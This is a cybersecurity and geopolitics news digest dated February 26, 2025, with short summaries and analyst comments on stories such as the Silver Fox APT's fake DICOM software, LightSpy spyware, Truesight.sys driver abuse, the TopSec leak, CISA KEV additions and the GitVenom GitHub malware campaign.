Wednesday, Feb 26, 2025 // (IG): BB // GITHUB // SN R&D
China’s SpaceSail Accelerates Satellite Internet Race Against Starlink
Bottom Line Up Front (BLUF): China’s state-backed SpaceSail is rapidly expanding its low-Earth orbit (LEO) satellite internet network, positioning itself as a significant rival to Elon Musk’s Starlink. The company has launched operations in Brazil and Kazakhstan, with plans to deploy 648 satellites in 2025 and 15,000 by 2030 as part of the Qianfan constellation. China is investing heavily in LEO satellite technology, with state-backed companies and military-affiliated researchers developing tracking tools to monitor Starlink’s activities.
Analyst Comments: China’s push into LEO satellite communications signals a broader geopolitical strategy to reduce reliance on Western technology and expand digital influence through the Belt and Road Initiative. SpaceSail’s expansion into developing markets aligns with China’s goal of securing strategic orbital slots before regulations tighten. Meanwhile, military-backed research into Starlink’s capabilities suggests China views satellite internet as a national security concern, potentially paving the way for countermeasures against Western networks. As SpaceSail, Amazon’s Project Kuiper, and other players ramp up satellite deployments, the global competition for orbital dominance intensifies.
FROM THE MEDIA: SpaceSail, a Shanghai-based company controlled by the municipal government, is rapidly deploying LEO satellites to challenge Starlink’s global high-speed satellite internet dominance. The company has expanded into Brazil and Kazakhstan, with discussions ongoing in over 30 countries. Beijing has backed multiple LEO satellite initiatives, with a target of 43,000 satellites in the coming decades. Chinese researchers have also focused on cost-efficient satellite networks and tracking Starlink’s constellation, with military-affiliated institutions designing algorithms to monitor its activities. Western policymakers have raised concerns that China’s satellite expansion could be used to extend its internet censorship regime and expand geopolitical influence under the Belt and Road Initiative.
READ THE STORY: Cybernews
China-Backed Silver Fox APT Installs Backdoors in Healthcare Networks
Bottom Line Up Front (BLUF): A Chinese state-backed hacking group, Silver Fox APT, has been found exploiting medical imaging software to install backdoors, keyloggers, and cryptocurrency miners on patients' computers. Researchers at Forescout’s Vedere Labs discovered the campaign, which disguises malware as Philips DICOM medical software, enabling attackers to compromise hospital networks. The attack includes multiple evasion techniques, such as encrypted payloads stored in Alibaba Cloud and antivirus bypass mechanisms.
Analyst Comments: This campaign highlights the growing trend of targeting healthcare systems through indirect infection vectors, focusing on patients rather than hospital infrastructure. Silver Fox APT gains access to highly sensitive health data by spoofing trusted medical software while establishing persistent access to networks. The malware’s multi-stage execution, including PowerShell-based security evasion, shows high sophistication. Given Silver Fox’s history of expanding beyond Chinese-speaking targets, North American and European healthcare providers should prepare for increased espionage and financially motivated cyber threats.
FROM THE MEDIA: According to Forescout researchers, Silver Fox APT is distributing malware-laced versions of Philips DICOM imaging software, infecting patient devices and potentially infiltrating hospital networks. The attack begins with a first-stage malware dropper (MediaViewerLauncher.exe), which contacts a command-and-control (C2) server hosted on Alibaba Cloud to fetch encrypted payloads. The malware terminates security software using TrueSightKiller, then installs ValleyRAT, a remote access trojan (RAT) that enables full system control. The final payload includes a keylogger and cryptocurrency miner, increasing espionage and financial motives. Silver Fox has recently expanded operations to English-speaking regions, with malware submissions from the US and Canada, suggesting an escalating threat to Western healthcare systems.
READ THE STORY: The Register // INFOSEC MAG
US and Ukraine Finalize Minerals Deal Amid Security Uncertainty
Bottom Line Up Front (BLUF): Ukraine has agreed to a minerals deal with the United States to strengthen its economic ties with the Trump administration. The agreement allows joint development of Ukraine’s mineral resources, including oil and gas, while the US has dropped an earlier demand for $500 billion in potential revenue. However, the final deal does not include security guarantees for Ukraine, a key point Kyiv had initially sought. President Volodymyr Zelensky is expected to travel to Washington, D.C., on Friday to formalize the deal with President Donald Trump.
Analyst Comments: This agreement marks a shift in US-Ukraine relations, moving from a purely military alliance toward an economic partnership. However, the omission of security guarantees raises concerns about Ukraine’s long-term strategic position, especially as the US has begun bilateral talks with Russia without Ukraine’s involvement. The deal could provide short-term economic benefits but may leave Ukraine vulnerable if military aid declines. The US stake in Ukraine’s mineral wealth could become contentious, particularly if future governments seek to renegotiate terms.
FROM THE MEDIA: Kyiv has agreed to jointly develop its mineral resources with the US, finalizing an agreement that had previously stalled over harsh financial demands from Washington. The revised deal requires Ukraine to contribute 50% of proceeds from the future monetization of state-owned mineral resources to a US-backed fund that will invest in projects within Ukraine. However, it excludes existing assets controlled by major Ukrainian energy firms like Naftogaz and Ukrnafta. While the agreement strengthens economic cooperation, it notably lacks security guarantees, which Ukraine had initially pushed for. Despite skepticism from opposition lawmakers in Kyiv, the deal has been approved by Ukraine’s justice, economy, and foreign ministers. The agreement's jurisdiction and final implementation details remain unresolved and will require further negotiations.
LightSpy Spyware Expands Capabilities, Infiltrates Windows, macOS, Linux, and Mobile Devices
Bottom Line Up Front (BLUF): Researchers have uncovered a major upgrade to the LightSpy spyware, which now supports over 100 commands and can extract data from social media apps like Facebook and Instagram. Initially documented in 2020, LightSpy has evolved into a cross-platform surveillance tool capable of infecting Windows, macOS, Linux, Android, iOS, and routers. The malware’s new features include enhanced operational control, keylogging, and expanded data collection.
Analyst Comments: LightSpy’s increasing modularity and cross-platform reach suggest it is being developed for long-term cyber-espionage campaigns. The ability to exfiltrate private social media messages and track user behavior raises concerns about state-sponsored surveillance and cybercrime operations. The malware’s new Windows-specific plugins also indicate an expansion into corporate and government targets, potentially compromising sensitive data. The removal of iOS-destructive plugins suggests attackers are prioritizing data collection over disruption. Organizations should implement robust endpoint security, network monitoring, and threat intelligence measures to detect and mitigate LightSpy infections.
FROM THE MEDIA: According to Hunt.io, LightSpy’s latest iteration shifts focus from direct data theft to broader operational control, with new commands managing transmission operations and plugin versions. The spyware now supports over 100 commands across Windows, macOS, Linux, Android, and iOS, allowing attackers to control infected devices remotely. LightSpy’s Windows-specific plugins enable keylogging, audio recording, and USB interaction, making it a powerful tool for long-term surveillance. Researchers also identified an admin panel endpoint that grants attackers remote control of infected mobile devices, further enhancing the spyware’s capabilities.
READ THE STORY: THN
China-Linked Hackers Breach US Republican Party’s Email System
Bottom Line Up Front (BLUF): Chinese hackers infiltrated the Republican National Committee’s (RNC) internal email system in July 2024, allegedly to gather intelligence on the party’s stance toward Taiwan, according to a Wall Street Journal report. Microsoft detected the breach and notified RNC officials, who opted not to inform the FBI due to concerns about media leaks. The extent of the compromise remains unclear, but it aligns with China’s long-standing practice of targeting US political campaigns to anticipate future policy shifts.
Analyst Comments: The timing of the breach—just before the RNC’s national convention—suggests an effort to shape China’s Taiwan strategy based on the Republican Party’s evolving stance. RNC officials’ decision to withhold disclosure from the FBI raises concerns about political sensitivities outweighing national security protocols. Given past cyberattacks on US elections, this breach underscores the persistent vulnerability of political organizations to foreign intelligence operations.
FROM THE MEDIA: According to an upcoming book by journalist Alex Isenstadt, Revenge: The Inside Story of Trump’s Return to Power, Chinese hackers infiltrated RNC email systems in mid-2024. The breach occurred while the Republican Party was revising its platform, removing previous references to a free-trade agreement with Taiwan. Microsoft alerted RNC leadership to the compromise, stating that attackers had access for months. However, RNC officials, including Trump campaign cochair Chris LaCivita, did not notify federal authorities, fearing media exposure. The Chinese embassy in Washington dismissed the allegations, stating that China opposes cyberattacks in all forms. Meanwhile, US cybersecurity officials warn that both Democratic and Republican campaigns have been frequent targets of Chinese espionage efforts for over a decade.
READ THE STORY: Taipei Times // The Register
2,500+ Truesight.sys Driver Variants Exploited to Bypass EDR and Deploy HiddenGh0st RAT
Bottom Line Up Front (BLUF): A large-scale malware campaign is exploiting vulnerabilities in the Truesight.sys driver (version 2.0.2) to bypass Endpoint Detection and Response (EDR) software and deploy HiddenGh0st RAT. Attackers have generated over 2,500 modified driver variants to evade detection, using the Bring Your Own Vulnerable Driver (BYOVD) technique. The majority of victims are located in China, Singapore, and Taiwan, with evidence suggesting links to the Silver Fox APT threat group.
Analyst Comments: This campaign underscores the ongoing weaponization of vulnerable drivers to disable security solutions before delivering advanced malware. By creating multiple hash variants of the driver while keeping its signature intact, attackers could bypass detection for months, evading Microsoft's Vulnerable Driver Blocklist and industry-standard security tools. HiddenGh0st RAT, a well-documented remote access Trojan, suggests espionage and data theft as primary objectives. Although Microsoft has now updated its driver blocklist to mitigate this threat, similar BYOVD attacks will likely persist, emphasizing the need for proactive driver security policies.
FROM THE MEDIA: Researchers at Check Point discovered that attackers have been modifying and repackaging the vulnerable Truesight.sys driver to evade detection while deploying HiddenGh0st RAT. The campaign, active since June 2024, utilizes fake luxury product websites and fraudulent Telegram channels to distribute malware disguised as legitimate applications. Once executed, the malware downloads the Truesight.sys driver, which then terminates security software before launching a secondary payload. This next-stage malware mimics standard file formats (PNG, JPG, GIF) and eventually loads HiddenGh0st RAT, enabling attackers to steal data, conduct surveillance, and manipulate systems remotely. Microsoft addressed this vulnerability on December 17, 2024, by adding Truesight.sys to its driver blocklist, but attackers had already exploited the flaw for months before the update.
READ THE STORY: THN
Russian Officials Warn of Potential Cyberattack on LANIT, Major Tech Services Provider
Bottom Line Up Front (BLUF): Russia’s National Coordination Center for Computer Incidents (NCCCI) has publicly warned about a possible cybersecurity breach involving subsidiaries of LANIT, the country’s largest tech services provider. The incident likely affected LANIT’s payment processing and banking software subsidiaries, which provide financial institutions and ATM services. Authorities have advised businesses using LANIT’s software to change passwords and access keys as a precaution.
Analyst Comments: The fact that Russian authorities publicly acknowledged a cyberattack on a state-affiliated contractor is notable, as such incidents are rarely disclosed. LANIT, which provides IT services to Russia’s Ministry of Defense and defense industry, was sanctioned by the U.S. in 2024 due to its support for Russia’s war efforts. Given recent pro-Ukrainian cyber activity targeting Russian financial institutions, Ukraine-linked hackers may be responsible, though no attribution has been confirmed. If LANIT's infrastructure has been compromised, it could impact Russia’s financial and defense sectors, making this a potentially high-impact breach.
FROM THE MEDIA: The NCCCI’s warning comes after reports that subsidiaries of LANIT, a significant IT contractor for Russian state entities, may have suffered a cybersecurity breach. LANIT is involved in software development, system integration, and cybersecurity and has key contracts with Russia’s Ministry of Defense and the aerospace sector. While the specific details of the breach remain unclear, Russian authorities have urged LANIT customers to update credentials and review access permissions, especially for systems with remote access granted to LANIT engineers. This disclosure follows a series of cyberattacks targeting Russian financial institutions, many of which have been attributed to Ukraine-linked hacking groups. LANIT has not commented on the reported compromise, and the attackers’ identity remains unknown.
READ THE STORY: The Record // MSSP Alert
Chinese Cybersecurity Firm TopSec Leaks Data on Government Monitoring Operations
Bottom Line Up Front (BLUF): A data leak from Chinese cybersecurity firm TopSec has exposed its role in monitoring online content for government agencies, according to SentinelLabs. The leaked 7,000 lines of logs and code reveal how TopSec aids China’s state-owned enterprises and regulatory bodies in censorship and surveillance. The company specializes in Endpoint Detection & Response (EDR), vulnerability scanning, and cloud security and provides Tier 1 vulnerability intelligence to China’s intelligence agencies.
Analyst Comments: This leak sheds light on China’s deep integration of private cybersecurity firms into state surveillance. The exposure of TopSec’s operations confirms long-held concerns that Chinese firms play a direct role in internet censorship and digital espionage. The incident raises global cybersecurity concerns, as TopSec’s services may be embedded in networks beyond China. While the mechanism of the leak remains unclear, it underscores the risk of compromised sensitive government-linked data, potentially exposing China’s cyber operations to foreign intelligence. Organizations working with Chinese cybersecurity vendors should reassess data security risks and logging practices to prevent similar exposures.
FROM THE MEDIA: Researchers at SentinelLabs discovered a significant data leak from TopSec, a major Chinese cybersecurity firm. The leaked information includes scripts connecting to government, academic, and news websites, indicating the company’s role in China’s internet monitoring infrastructure. Among the agencies referenced are the Municipal Commissions for Discipline Inspection, which investigates corruption, and the Illegal and Harmful Information Reporting Center, responsible for censoring politically sensitive content. Established in 1995, TopSec has provided cloud monitoring services since 2004, expanding its reach across all Chinese administrative regions by 2020. The leak highlights the blurred lines between China’s public sector policies and private cybersecurity firms, raising global concerns about data security and digital governance.
READ THE STORY: SECBrief
CISA Adds Microsoft and Zimbra Flaws to KEV Catalog Amid Active Exploitation
Bottom Line Up Front (BLUF): The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two newly exploited vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. The flaws, impacting Microsoft Partner Center (CVE-2024-49035, CVSS 8.7) and Synacor Zimbra Collaboration Suite (CVE-2023-34192, CVSS 9.0), allow for privilege escalation and remote code execution, respectively. Federal agencies must patch these vulnerabilities by March 18, 2025, to comply with security directives.
Analyst Comments: While Microsoft has acknowledged in-the-wild exploitation of CVE-2024-49035, details on its abuse remain scarce. The Zimbra vulnerability (CVE-2023-34192), though patched in July 2023, has now surfaced as an active exploit, signaling that threat actors continue to leverage outdated vulnerabilities. Organizations relying on Microsoft Partner Center or Zimbra Collaboration Suite should immediately apply security updates to mitigate risks, especially given the increasing use of email and cloud collaboration services in cyberattacks.
FROM THE MEDIA: CISA has issued a security directive requiring Federal Civilian Executive Branch (FCEB) agencies to patch two actively exploited vulnerabilities affecting Microsoft Partner Center and Zimbra Collaboration Suite. CVE-2024-49035, a privilege escalation vulnerability, was patched in November 2024, but Microsoft has confirmed real-world exploitation. CVE-2023-34192, an XSS vulnerability in Zimbra, was fixed in July 2023, yet remains a target for cybercriminals. The move follows CISA’s recent addition of Adobe ColdFusion and Oracle Agile PLM vulnerabilities to its KEV catalog. Organizations using these products must prioritize patching to prevent potential data breaches and system compromises.
READ THE STORY: THN
Items of interest
GitVenom Malware Hijacks Bitcoin Wallets Using Fake GitHub Projects
Bottom Line Up Front (BLUF): A sophisticated malware campaign dubbed GitVenom has been found infecting GitHub repositories to steal cryptocurrency and sensitive user data. Researchers at Kaspersky report that the campaign has been active for at least two years, using fake open-source projects to trick developers, gamers, and crypto investors. The malware has stolen approximately $456,600 (5 BTC), primarily targeting users in Russia, Brazil, and Turkey.
Analyst Comments: GitVenom highlights a growing trend where code-sharing platforms like GitHub are exploited to distribute malware, leveraging the trust developers place in open-source software. Clipper malware—which replaces copied wallet addresses to redirect funds—demonstrates a direct monetization strategy. Additionally, including remote administration tools (RATs) like AsyncRAT and QuasarRAT suggests an interest in long-term access to infected systems. Given GitHub’s vast ecosystem, similar threats will likely persist, necessitating strict code vetting before execution.
FROM THE MEDIA: Kaspersky uncovered over 200 malicious GitHub repositories masquerading as legitimate open-source projects, including Instagram automation tools, Telegram Bitcoin wallet managers, and Valorant game cheats. These repositories, designed to appear credible with thousands of commits and detailed README files, contain embedded malware that, when executed, downloads additional payloads from attacker-controlled GitHub repositories. The malware includes a Node.js-based information stealer that collects passwords, bank details, cryptocurrency wallets, and browsing history before exfiltrating the data via Telegram. Additionally, a clipper malware hijacks copied wallet addresses to redirect cryptocurrency transactions, while remote access trojans (RATs) like AsyncRAT and QuasarRAT enable attackers to maintain persistent control over infected systems. Security experts emphasize the need for rigorous code review before executing third-party software, as GitHub remains a prime target for cybercriminals.
READ THE STORY: THN // The Register
Hackers Use Github For Malware (Video)
FROM THE MEDIA: Cybercriminals abuse GitHub to distribute malware through fake open-source projects, targeting developers, gamers, and cryptocurrency investors. Security researchers at Kaspersky uncovered over 200 malicious repositories which have been active for at least two years. The campaign, dubbed GitVenom, has facilitated the theft of approximately $456,600 in Bitcoin (5 BTC) by hijacking clipboard wallet addresses and stealing sensitive user data.
Github is Dangerous (Video)
FROM THE MEDIA: Imagine diving into GitHub, looking for cool projects to level up your coding skills—only to discover that hackers hide malware inside fake repositories. In this video, I’m exposing a sneaky cyber campaign where attackers weaponize GitHub’s trust to spread tools like AsyncRAT, clipper malware, and info stealers—right under everyone’s noses. Stay tuned to learn how they do it and how you can protect yourself from these hidden threats!
The selected stories cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in its original material or related links on its sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.